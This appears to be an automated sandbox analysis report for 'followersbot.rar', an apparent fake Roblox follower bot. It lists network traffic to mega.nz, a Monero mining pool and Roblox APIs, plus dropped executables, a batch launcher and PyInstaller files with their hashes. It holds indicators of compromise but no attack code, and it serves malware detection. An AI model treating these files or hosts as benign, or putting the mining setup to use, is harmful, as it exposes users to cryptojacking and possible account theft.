GB 172.165.69.228:443 data-edge.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 data-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 mega.nz udp
LU 31.216.144.5:443 mega.nz tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 169.96.87.13.in-addr.arpa udp
US 8.8.8.8:53 5.144.216.31.in-addr.arpa udp
LU 31.216.144.5:443 mega.nz tcp
US 8.8.8.8:53 eu.static.mega.co.nz udp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
US 8.8.8.8:53 11.127.203.66.in-addr.arpa udp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 15.125.203.66.in-addr.arpa udp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 gfs206n460.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs208n207.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs204n309.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs270n460.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs240n124.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs214n200.userstorage.mega.co.nz udp
BE 94.24.37.128:443 gfs206n460.userstorage.mega.co.nz tcp
BE 94.24.37.128:443 gfs206n460.userstorage.mega.co.nz tcp
BE 94.24.37.128:443 gfs206n460.userstorage.mega.co.nz tcp
BE 94.24.37.128:443 gfs206n460.userstorage.mega.co.nz tcp
FR 185.206.26.137:443 gfs208n207.userstorage.mega.co.nz tcp
FR 185.206.26.137:443 gfs208n207.userstorage.mega.co.nz tcp
FR 185.206.26.137:443 gfs208n207.userstorage.mega.co.nz tcp
FR 185.206.26.137:443 gfs208n207.userstorage.mega.co.nz tcp
NL 185.206.24.154:443 gfs204n309.userstorage.mega.co.nz tcp
NL 185.206.24.154:443 gfs204n309.userstorage.mega.co.nz tcp
NL 185.206.24.154:443 gfs204n309.userstorage.mega.co.nz tcp
NL 185.206.24.154:443 gfs204n309.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
SE 69.30.89.34:443 gfs240n124.userstorage.mega.co.nz tcp
SE 69.30.89.34:443 gfs240n124.userstorage.mega.co.nz tcp
SE 69.30.89.34:443 gfs240n124.userstorage.mega.co.nz tcp
SE 69.30.89.34:443 gfs240n124.userstorage.mega.co.nz tcp
ES 185.206.27.112:443 gfs214n200.userstorage.mega.co.nz tcp
ES 185.206.27.112:443 gfs214n200.userstorage.mega.co.nz tcp
ES 185.206.27.112:443 gfs214n200.userstorage.mega.co.nz tcp
ES 185.206.27.112:443 gfs214n200.userstorage.mega.co.nz tcp
US 8.8.8.8:53 154.24.206.185.in-addr.arpa udp
US 8.8.8.8:53 137.26.206.185.in-addr.arpa udp
US 8.8.8.8:53 128.37.24.94.in-addr.arpa udp
US 8.8.8.8:53 43.148.216.31.in-addr.arpa udp
US 8.8.8.8:53 34.89.30.69.in-addr.arpa udp
US 8.8.8.8:53 112.27.206.185.in-addr.arpa udp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 checkappexec.microsoft.com udp
GB 51.11.108.188:443 checkappexec.microsoft.com tcp
US 8.8.8.8:53 188.108.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 146.59.154.106:10343 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 106.154.59.146.in-addr.arpa udp
US 8.8.8.8:53 users.roblox.com udp
DE 128.116.44.4:443 users.roblox.com tcp
US 8.8.8.8:53 thumbnails.roblox.com udp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
US 8.8.8.8:53 4.44.116.128.in-addr.arpa udp
US 8.8.8.8:53 tr.rbxcdn.com udp
GB 2.18.190.78:443 tr.rbxcdn.com tcp
US 8.8.8.8:53 78.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
US 8.8.8.8:53 tr.rbxcdn.com udp
GB 2.18.190.78:443 tr.rbxcdn.com tcp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
US 8.8.8.8:53 tr.rbxcdn.com udp
GB 2.18.190.78:443 tr.rbxcdn.com tcp
LU 66.203.125.15:443 g.api.mega.co.nz tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 78bc0ec5146f28b496567487b9233baf
SHA1 4b1794d6cbe18501a7745d9559aa91d0cb2a19c1
SHA256 f5e3afb09ca12cd22dd69c753ea12e85e9bf369df29e2b23e0149e16f946f109
SHA512 0561cbabde95e6b949f46deda7389fbe52c87bedeb520b88764f1020d42aa2c06adee63a7d416aad2b85dc332e6b6d2d045185c65ec8c2c60beac1f072ca184a

\??\pipe\LOCAL\crashpad_4660_OBUELAYIVHZVWVGC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

MD5 e5e3377341056643b0494b6842c0b544
SHA1 d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256 e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a134f1844e0964bb17172c44ded4030f
SHA1 853de9d2c79d58138933a0b8cf76738e4b951d7e
SHA256 50f5a3aaba6fcbddddec498e157e3341f432998c698b96a4181f1c0239176589
SHA512 c124952f29503922dce11cf04c863966ac31f4445304c1412d584761f90f7964f3a150e32d95c1927442d4fa73549c67757a26d50a9995e14b96787df28f18b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ba5c5937c8d342ab147cc52672e5ec5d
SHA1 56d55d27748f151bf6d2b5441716d10d5a34e186
SHA256 b01c13253dac9db98abdd7ab625353cbb84e79803b756705203b7d4e1f1ed0f5
SHA512 1ff44aa1c55c31c8ce256a07ff691b2c1bb90e0caac67fc35cf704cc94d020db30c3f7aeb9cdda678ae991c222f12d9ca52d8d1f78c59b16e9e50cc931039362

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 9010fe212d7da97a4e9cf63a903ee7a4
SHA1 8f124a736d045eea3c50a9597d18c9af8b128e28
SHA256 c2956b77f9af9f4d79e0198d8a7e0a5b6f880b4d597dfeee25a3f56c05d11834
SHA512 f763ab3261592107fb19b7d6134c7f4d02e921258b1c72f1e0c69a95ee8ed9cc20498259a279cca9648bbd213a5234b965a9196865d465e1f975ee9242e36326

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 e07a48a67f1d3574c4fe4b0cb48e457b
SHA1 3897cf01e90a8460b38585d978601eb19350484b
SHA256 c38abf357108c7e44a4db8b47d522b2decdbd2489fb914969864a1620161cd6a
SHA512 fee7fa2d6cc5a0d569cbd31d0d131e903363eb8da36b22492b932725ec9a3f28f20298cc8c999f29a6d0891c085cfbe1f21550f536742d58b202ae21f9044ec8

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 790a026f721ef1f9cd064365f2669ef0
SHA1 dbfce4d68bb936cab00e67bac62c8c3a56db4304
SHA256 278329f09bbf2898548cb01ab8ea4f156187f7bcfd5098224048f73324c31926
SHA512 1de9c6fd333d4b4c854919a517d80d3253c946c718e9fe684cb746da692e73e48258fa15437437fc2d02f0a7970f745b0e4c7f0d84e54b6b50fe15e15df20f14

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 745b3b26d878f235aea9f78d9d2f6486
SHA1 8b19482427ac25c427cfbc5aafd5bb6cde76adfc
SHA256 9439e5d13ab16ea6b36d6e648a30b05dc5201aab8cc9304848a77a00359fb1e2
SHA512 855e4aa314546187fef216ac8bde512c2f6d4074cb347d8533eed394c922b78f083ae27e9e02fc8129438146308c31c6cd67787d0ea881cac607fc1dca405685

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 309a809052ac1575e72b6ed042b92fff
SHA1 973e5c7bbbf43ed48e14879dfe8e8643a9069a97
SHA256 9052239b22ee36fccb80d48a6a14fddf58b8e61d85b107d57dc239fbac6bfc7e
SHA512 cb251ef77773c097a13cfdaa069f95e36ba138d3f43911a013089d57ef1ed389090b879f679c20839db4b1021729d68455d5eb9ab516052a4325d9e5f84207e6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 21320325bdfc20c6f4e4d136228fc9c5
SHA1 7e96950811d7ddbc1daeb7341ddb9768980bf2b5
SHA256 5e7ac2b978206a07d8b1841a2bd89eae4b466bcd8a0df3a62ae2ca0439b8bd5e
SHA512 ee78316d5b8edffdc83e3431bdbd28ae05a481d2a445ddf3b7c58bf0f01c6c42aead46a4d91e7fc75519a5ca8a7e2bab78749d88476c7a2fa0a25e8b3592bd43

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\Downloads\followersbot.rar

MD5 c814222224a59b504d14638e5e7b6db1
SHA1 9c4abc0101a9b1550d473ec3e1c2283b6d9dc6c2
SHA256 5dc2f1140e1e51fd9ab9fac58d7a8f769b64035d730f359dd7f538b8d00f2e42
SHA512 302382418b2e43add39e7be14f5ef70fc9313337b95a17eee6b368abd08756627875b75a0140e3ab7bdf2d6ac45f34ede07c87e3b7fb9b93275327fe8222aa78

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 2e9fbc807515ad895c5180005d29b362
SHA1 f342ea1993ab42107fb4829a094734276d81b62a
SHA256 d0d7281a9eb763bda85c9e71e4973176ab17c4fb3ecba0b095df7e124e9c502f
SHA512 ae1611224aa2c5daa45004c9db3e2e39e05fb4681e56b854b7d102ee9703b07e4027981c4ac4b000866f565616eac850c327001e1be9582b15de8ec2c55e9531

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 4067909072f20507fae026eb473dfba6
SHA1 5e22d41172315c00fcad9bfe6112685e133088de
SHA256 f81c5542cec4ab5776067f9397e16d617a531b2891a2c8ea0f27d2d071026173
SHA512 081e5afa4a198f4cc76c9e473b9ff9672889943c2b53e4afca1ae933c14fc8a83abdb342bd5bc7e0359b52b13d834862922b077e319e146ea51ca418156e58fa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 80e44615768b008433666037c3414180
SHA1 c175ff6d7ae33c0ffd8888832b5c398980b569d6
SHA256 c2c7d64c2e3de9e05fa820cf7aff87218881664067406e2614319a9a2b9e62ba
SHA512 9a9a89bc048f9f36de0ce1cc4794565e1c79ae4244248bbbee56c67bd39a3594d9d474d506545d61a0f5c6cf79d2368ce9ba58f8ed1fdc63047a39c24cd528e6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe581e8f.TMP

MD5 f13ccb1555f7b2cf66e98a0d99d7bcf4
SHA1 c52c01c6a8d2206d00e45f89a6d53bf54cdac401
SHA256 b0a4edf312f1bc70fd4cbb839837c0e11232e4843930e0fe68952d1b351a780e
SHA512 39c3293beebcbd9da92d676c5525ec8069dec89c8a2f7207ae7e1548f6afdd747c5715dec55ddddc997f86c9a6f7f1ff21062ec7f53e2c324c9561f1de07b335

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7e6a13d28b1be1e28140ea15f3ad06fb
SHA1 a3644c64eb5d2888718638d6fff8968cabdeaa8e
SHA256 55f954bf0ea970d811eee10fc61b79490902c7870e4afcd13bbad2275625a0e3
SHA512 27621940ea0446ca6b2bf4a9e46bb057d9118d3d9146607faa7c0c360cea07c263e76094252e4ee4cde10ccb5cacd04418c22b14f0a4221f97173e6c5871cfb1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fe7a37a3e2f70c75e4179893f299c91f
SHA1 0b87dc2e5f277e0182dae31941c4e0d2d4a7d291
SHA256 6c27629445737e9ab192ef5a47e0315f3549c669a3afa320bf111524123bac98
SHA512 cd6c80f52330e9c981f24feedf70fd8d7f8c3b3b1dc234c13e415b8777fdbcc6cf64a1baa24025aebcd1c7d51390b30928a6bd69a4edbcd31ab4e5dcf7cdbb22

C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat

MD5 e9b3fc35d83a8ccd63029231ffacd8c1
SHA1 f7ef1e3ca8141a0b75a7448b8c81b34d24313fe4
SHA256 5cb4af357d6ce0ed884623d3d63c6423991a3a36370c55f5e907493a6ece2e2c
SHA512 156c3790c0b974dad7e71744a1b2791b71eb3eaa65a918bf8638f224901f6f284f71b4dbfcad3f301cc54cd7e19dd8cc8be0b0cb7730072a46c1e318f133964d

C:\Users\Admin\Downloads\followersbot\9SHCODL.exe

MD5 24220a523e23833de9f004e547b96699
SHA1 f6f2d8973f57d216949962499c1ef1c85f21a1cb
SHA256 cc15d14f848e1fc20855f75d6bd07b3c1e2f9bc6d0e4d28833312358e5ac9d78
SHA512 e5652171b5f850c80672fdb3e3390a84f7388ace67c412072800bff57191e1816834c63e0263a12e1c9b91243ea3fefe416d4bde690a9ea9d43fb1bf83339b7f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 120cfc451488c658f0a0e8ba54fc8778
SHA1 78d69ec0fa2cbd2c62b38ee4f6a863a3da6373a2
SHA256 cf7c4df93e5a5e4e313da00103a17ca475a1de16fb55108fef5ee830e3a3e070
SHA512 cbdf0c769565bc2bf3d2a8b6434e9d5524d5edd6974c06a389a650772ce9316ab23fd4461e8db835885598dfcfbded9e42c43438075cfbaa21f3891845745cf2

memory/6108-570-0x0000021F69CE0000-0x0000021F69D02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e31trrxv.nop.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5532-582-0x0000000140000000-0x000000014002B000-memory.dmp

memory/5532-585-0x0000000140000000-0x000000014002B000-memory.dmp

memory/5532-587-0x0000000140000000-0x000000014002B000-memory.dmp

memory/5532-584-0x0000000140000000-0x000000014002B000-memory.dmp

memory/5532-583-0x0000000140000000-0x000000014002B000-memory.dmp

memory/5696-618-0x0000018563690000-0x00000185636AC000-memory.dmp

memory/5696-619-0x00000185636B0000-0x0000018563765000-memory.dmp

memory/5696-620-0x0000018563680000-0x000001856368A000-memory.dmp

memory/6104-629-0x0000000140000000-0x000000014000E000-memory.dmp

memory/6104-632-0x0000000140000000-0x000000014000E000-memory.dmp

memory/760-636-0x0000000140000000-0x0000000140835000-memory.dmp

memory/760-649-0x0000000140000000-0x0000000140835000-memory.dmp

memory/760-642-0x0000000140000000-0x0000000140835000-memory.dmp

memory/760-648-0x0000000140000000-0x0000000140835000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6db666b8eea8c87bb44fc342dbda5fcb
SHA1 2536fb957e13fd2144e482970707286ca2625816
SHA256 079b31aa6c5078c9a97ffc9cfd2778942fbb12359b05975eb18507b6a1f18438
SHA512 88fcd3e8aaefc443b3fac3ec5a55762424a9d2211b051a36daad0c6be63f7a3f6f51d4be4e89189be044c7df6bcbded7eab6d3cba07a7a1458c48604b365579e

memory/1784-652-0x00007FF9B61F0000-0x00007FF9B63E8000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a4fe0be11fb007b21a2fafa6abe0bf6f
SHA1 d0f2c0a5c7ee3491272101c3aaf7998bbb2fd22a
SHA256 ec0577e1bf334d310a1a70fd57fd1e561a90bbdd34737daed674f01c36c0c8d2
SHA512 1c51108e19f5a97acb7bba7c996c26a2715e3a4bb04b79c9afd718f8b8822bf906123e42eb1e40c88206bbce86b43546644d88794cc0de26126a38d9e27e01c0

memory/1784-662-0x00007FF9B5CB0000-0x00007FF9B5D6D000-memory.dmp

memory/1784-650-0x00000164AC310000-0x00000164AC33A000-memory.dmp

memory/760-647-0x0000000140000000-0x0000000140835000-memory.dmp

memory/5368-667-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5368-671-0x00007FF9B5CB0000-0x00007FF9B5D6D000-memory.dmp

memory/5368-670-0x00007FF9B61F0000-0x00007FF9B63E8000-memory.dmp

memory/5368-669-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5368-673-0x0000000140000000-0x0000000140008000-memory.dmp

memory/676-689-0x0000019F9C800000-0x0000019F9C82B000-memory.dmp

memory/600-685-0x00007FF976270000-0x00007FF976280000-memory.dmp

memory/600-684-0x000001C6ED7E0000-0x000001C6ED80B000-memory.dmp

memory/600-678-0x000001C6ED7E0000-0x000001C6ED80B000-memory.dmp

memory/600-677-0x000001C6ED7E0000-0x000001C6ED80B000-memory.dmp

memory/600-676-0x000001C6ED7B0000-0x000001C6ED7D5000-memory.dmp

memory/5368-666-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5368-665-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5368-664-0x0000000140000000-0x0000000140008000-memory.dmp

memory/760-643-0x0000000140000000-0x0000000140835000-memory.dmp

memory/760-644-0x0000020B08390000-0x0000020B083B0000-memory.dmp

memory/760-641-0x0000000140000000-0x0000000140835000-memory.dmp

memory/760-639-0x0000000140000000-0x0000000140835000-memory.dmp

memory/760-646-0x0000000140000000-0x0000000140835000-memory.dmp

memory/760-645-0x0000000140000000-0x0000000140835000-memory.dmp

memory/6104-638-0x0000000140000000-0x000000014000E000-memory.dmp

memory/760-640-0x0000000140000000-0x0000000140835000-memory.dmp

memory/6104-631-0x0000000140000000-0x000000014000E000-memory.dmp

memory/6104-630-0x0000000140000000-0x000000014000E000-memory.dmp

memory/760-637-0x0000000140000000-0x0000000140835000-memory.dmp

memory/6104-628-0x0000000140000000-0x000000014000E000-memory.dmp

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

MD5 b91f955810b958a7f434fbc0d443c31f
SHA1 b2a89e5b6f75d48378f157fcd4be0d3da124e07b
SHA256 95f22f8d46189918f352d72345fcb79ade23209f547cdaaf61b3fda15e3a0930
SHA512 136ef7cc91e222e9aecc45d02937c282d415d5283f3a623c9df414d8000f002b4e472df03aec1bebdff196ceb068586a94edeb1109f0f1cc0b92bb5caf7d1e36

C:\Users\Admin\AppData\Local\Temp\_MEI60282\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI60282\pyexpat.pyd

MD5 4cb923b0d757fe2aceebf378949a50e7
SHA1 688bbbae6253f0941d52faa92dedd4af6f1dfc3b
SHA256 e41cff213307b232e745d9065d057bcf36508f3a7150c877359800f2c5f97cfc
SHA512 9e88542d07bd91202fcf13b7d8c3a2bbd3d78e60985b45f4fa76c6cd2a2abdee2a0487990bea0713f2ad2a762f120411c3fbbfaa71ef040774512da8f6328047

C:\Users\Admin\AppData\Local\Temp\_MEI60282\pythoncom310.dll

MD5 020b1a47ce0b55ac69a023ed4b62e3f9
SHA1 aa2a0e793f97ca60a38e92c01825a22936628038
SHA256 863a72a5c93eebaa223834bc6482e5465379a095a3a3b34b0ad44dc7b3666112
SHA512 b131e07de24d90a3c35c6fa2957b4fe72d62b1434c3941ad5140fb1323aacba0ec41732dac4f524dc2f492b98868b54adc97b4200aa03ff2ba17dd60baea5a70

C:\Users\Admin\AppData\Local\Temp\_MEI60282\tk86t.dll

MD5 4b6270a72579b38c1cc83f240fb08360
SHA1 1a161a014f57fe8aa2fadaab7bc4f9faaac368de
SHA256 cd2f60075064dfc2e65c88b239a970cb4bd07cb3eec7cc26fb1bf978d4356b08
SHA512 0c81434d8c205892bba8a4c93ff8fc011fb8cfb72cfec172cf69093651b86fd9837050bd0636315840290b28af83e557f2205a03e5c344239356874fce0c72b9

C:\Users\Admin\AppData\Local\Temp\_MEI60282\libcrypto-1_1.dll

MD5 ab01c808bed8164133e5279595437d3d
SHA1 0f512756a8db22576ec2e20cf0cafec7786fb12b
SHA256 9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55
SHA512 4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2

C:\Users\Admin\AppData\Local\Temp\_MEI60282\_ssl.pyd

MD5 80f2475d92ad805439d92cba6e657215
SHA1 20aa5f43ca83b3ff07e38b00d5fbd0cf3d7dbbab
SHA256 41278e309382c79356c1a4daf6dbb5819441d0c6e64981d031cda077bb6f1f79
SHA512 618cd6ca973a0b04159a7c83f1f0cda5db126a807982983fea68f343c21e606a3cdb60b95a2b07f4d9379149d844755b9767fea0a64dd1d4451ab894a1f865b5

C:\Users\Admin\AppData\Local\Temp\_MEI60282\tcl\encoding\cp1252.enc

MD5 e9117326c06fee02c478027cb625c7d8
SHA1 2ed4092d573289925a5b71625cf43cc82b901daf
SHA256 741859cf238c3a63bbb20ec6ed51e46451372bb221cfff438297d261d0561c2e
SHA512 d0a39bc41adc32f2f20b1a0ebad33bf48dfa6ed5cc1d8f92700cdd431db6c794c09d9f08bb5709b394acf54116c3a1e060e2abcc6b503e1501f8364d3eebcd52

C:\Users\Admin\AppData\Local\Temp\_MEI60282\tcl86t.dll

MD5 75909678c6a79ca2ca780a1ceb00232e
SHA1 39ddbeb1c288335abe910a5011d7034345425f7d
SHA256 fbfd065f861ec0a90dd513bc209c56bbc23c54d2839964a0ec2df95848af7860
SHA512 91689413826d3b2e13fc7f579a71b676547bc4c06d2bb100b4168def12ab09b65359d1612b31a15d21cb55147bbab4934e6711351a0440c1533fb94fe53313bf

C:\Users\Admin\AppData\Local\Temp\_MEI60282\_tkinter.pyd

MD5 5954a0102a4c2e6e0f71ceb2f6259fc9
SHA1 99b96da37baee75f0ab2d2165c8f194f26aa2041
SHA256 3ddcdec7a7a9b01f1af5a57f3cd66ae68883416fa7fb6aa7fa51b9cf1c24bf07
SHA512 5a986b2d931ea09048bce1d5816e9c8aaa63aeae48e4b5d844013e16a0229207553b4aabb4a790f55bcc5f5e0fabc5c819045b22d1d2e0eec9fe7ddcf1cba94d

C:\Users\Admin\AppData\Local\Temp\_MEI60282\pywintypes310.dll

MD5 bd1ee0e25a364323faa252eee25081b5
SHA1 7dea28e7588142d395f6b8d61c8b46104ff9f090
SHA256 55969e688ad11361b22a5cfee339645f243c3505d2963f0917ac05c91c2d6814
SHA512 d9456b7b45151614c6587cee54d17261a849e7950049c78f2948d93a9c7446b682e553e2d8d094c91926dd9cbaa2499b1687a9128aec38b969e95e43657c7a54

C:\Users\Admin\AppData\Local\Temp\_MEI60282\win32api.pyd

MD5 fc7b3937aa735000ef549519425ce2c9
SHA1 e51a78b7795446a10ed10bdcab0d924a6073278d
SHA256 a6949ead059c6248969da1007ea7807dcf69a4148c51ea3bc99c15ee0bc4d308
SHA512 8840ff267bf216a0be8e1cae0daac3ff01411f9afc18b1f73ba71be8ba70a873a7e198fd7d5df98f7ca8eee9a94eab196f138a7f9f37d35c51118f81860afb7d

C:\Users\Admin\AppData\Local\Temp\_MEI60282\_lzma.pyd

MD5 afff5db126034438405debadb4b38f08
SHA1 fad8b25d9fe1c814ed307cdfddb5cd6fe778d364
SHA256 75d450e973cd1ccbd0f9a35ba0d7e6d644125eb311cc432bb424a299d9a52ee0
SHA512 3334d2ad9811e3be70b5a9fd84bc725c717a3ac59e2fd87e178cb39ac9172db7f9ec793011c4e613a89773b4f2425be66d44a21145a9051bed35f55a483759cc

C:\Users\Admin\AppData\Local\Temp\_MEI60282\_bz2.pyd

MD5 d61719bf7f3d7cdebdf6c846c32ddaca
SHA1 eda22e90e602c260834303bdf7a3c77ab38477d0
SHA256 31dd9bfb64b1bee8faf925296028e2af907e6d933a83ddc570ebc82d11c43cfb
SHA512 e6c7eab95c18921439f63a30f76313d8380e66bd715afc44a89d386ae4e80c980c2632c170a445bad7446ee5f2c3ee233ccc7333757358340d551e664204e21f

C:\Users\Admin\AppData\Local\Temp\_MEI60282\select.pyd

MD5 994a6348f53ceea82b540e2a35ca1312
SHA1 8d764190ed81fd29b554122c8d3ae6bf857e6e29
SHA256 149427a8d58373351955ee01a1d35b5ab7e4c6ac1a312daa9ba8c72b7e5ac8a4
SHA512 b3dfb4672f439fa43e29e5b1ababca74f6d53ea4bad39dfe91f59382e23dbb2a3aea2add544892e3fcd83e3c5357ee7f09fe8ab828571876f68d76f1b1fcee2f

C:\Users\Admin\AppData\Local\Temp\_MEI60282\_socket.pyd

MD5 f59ddb8b1eeac111d6a003f60e45b389
SHA1 e4e411a10c0ad4896f8b8153b826214ed8fe3caa
SHA256 9558dda6a3f6ad0c3091d643e2d3bf5bf20535904f691d2bdb2ce78edf46c2da
SHA512 873c6841ebf38b217465f1ead02b46a8823ef1de67d6608701e30faf5024ed00ab3c4cc4aa8c4836552ecdb16c7470fe965cf76f26ee88615746d456ff6a2bcf

C:\Users\Admin\AppData\Local\Temp\_MEI60282\_ctypes.pyd

MD5 3fc444a146f7d667169dcb4f48760f49
SHA1 350a1300abc33aa7ca077daba5a883878a3bca19
SHA256 b545db2339ae74c523363b38835e8324799720f744c64e7142ddd48e4b619b68
SHA512 1609f792583c6293abddf7f7376ffa0d33a7a895de4d8b2ecebaede74e8850b225b3bf0998b056e40e4ebffb5c97babccf52d3184b2b05072c0dbb5dcb1866f8

